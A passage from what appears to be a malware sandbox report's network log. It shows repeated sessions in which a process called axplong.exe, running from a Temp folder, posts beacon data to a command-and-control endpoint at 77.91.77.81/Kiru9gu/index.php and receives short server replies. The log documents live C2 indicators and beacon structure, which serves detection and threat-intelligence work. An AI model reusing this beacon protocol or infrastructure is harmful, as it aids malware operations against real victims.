Jul 2, 2024 00:25:22.551599026 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:23.267669916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:23.268487930 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:23.494457960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:23.609884024 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:24.315927982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:24.316878080 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:24.543057919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:24.655972004 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:25.364902020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:25.366281986 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:25.589585066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:25.701524973 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:26.465480089 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:26.466460943 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:26.694894075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:26.811196089 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:27.521189928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:27.651746988 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:27.879669905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:28.129821062 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:28.828418016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:28.829478979 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:29.053596020 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:29.167996883 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:29.863626003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:29.864705086 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:30.086694956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:30.199284077 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:30.903441906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:30.922506094 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:31.143249989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:31.565912962 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:32.219683886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:32.220541000 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:32.436491013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:32.560513020 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:33.276540995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:33.277318954 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:33.508966923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:33.621260881 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:34.307826996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:34.316325903 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:34.532372952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:34.861696959 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:35.550955057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:35.551712036 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:35.770709991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:35.889019012 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:36.625209093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:36.626189947 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: 